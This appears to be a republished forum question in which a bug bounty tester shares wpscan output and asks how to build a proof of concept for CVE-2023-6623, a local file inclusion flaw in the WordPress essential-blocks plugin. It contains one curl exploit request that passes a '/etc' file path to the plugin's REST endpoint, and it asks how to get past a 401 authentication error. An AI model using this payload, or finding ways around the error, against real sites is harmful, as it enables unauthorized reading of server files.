• caglararli@hotmail.com
  • 05386281520

Navigating CVE-2023-6623: Seeking Assistance in Crafting a WordPress LFI Vulnerability Proof of Concept [closed]

Çağlar Arlı      -    9 Views
14Nis

Navigating CVE-2023-6623: Seeking Assistance in Crafting a WordPress LFI Vulnerability Proof of Concept [closed]

I was testing on a private bug bounty program and found one of its assets is running WordPress, upon enumerating its plugins using wpscan I found a plugin essential-blocks@4.0.8 which is vulnerable to LFI see CVE-2023-6623. However am unable to create a Poc for it.

wpscan output:

[+] essential-blocks
 | Location: https://foo.bar.com/wp-content/plugins/essential-blocks/
 | Last Updated: 2024-04-09T10:50:00.000Z
 | [!] The version is out of date, the latest version is 4.5.9
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 4.0.8 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://foo.bar.com/wp-content/plugins/essential-blocks/readme.txt

vp readme.txt (essential-blocks/readme.txt):

== Changelog ==

= 4.0.8 - 18/04/2023
- Fixed: Security update & bugfix

= 4.0.7 - 17/04/2023
- Fixed: **Count Down** block's error in style tab
- Fixed: **Flipbox** block's richtext invalid html tag issue
- Fixed: Assets generation issue
- Fixed: **Advanced Navigation** block's undefined js error ....

i think this confirms it really is running the version essential-blocks@4.0.8

however when i try to exploit it with

curl --url 'http://foo.bar.com/wp-json/essential-blocks
/v1/queries?block_type=nonexisting_block&query_data={"source":+"post"}
&attributes={"__file":+"/etc"}'

i get a 401 error as

{"code":"rest_cannot_access",
"message":"DRA: Only authenticated users can access the REST API.",
"data":{"status":401}}

Note: I am url encoding it before sending also I am pretty sure it's not blocked by any external WAF and is probably an issue with Wordpress. This POC was uploaded by wpscan itself, see https://wpscan.com/vulnerability/633c28e0-0c9e-4e68-9424-55c32789b41f/

I want to know:

  • What does this error mean
  • What steps can I further take to find the proper poc bypassing this error
  • On a rough estimate, can it be exploited with more leads or should I report this issue and avoid wasting any time

Son Yazılar

Son Yorumlar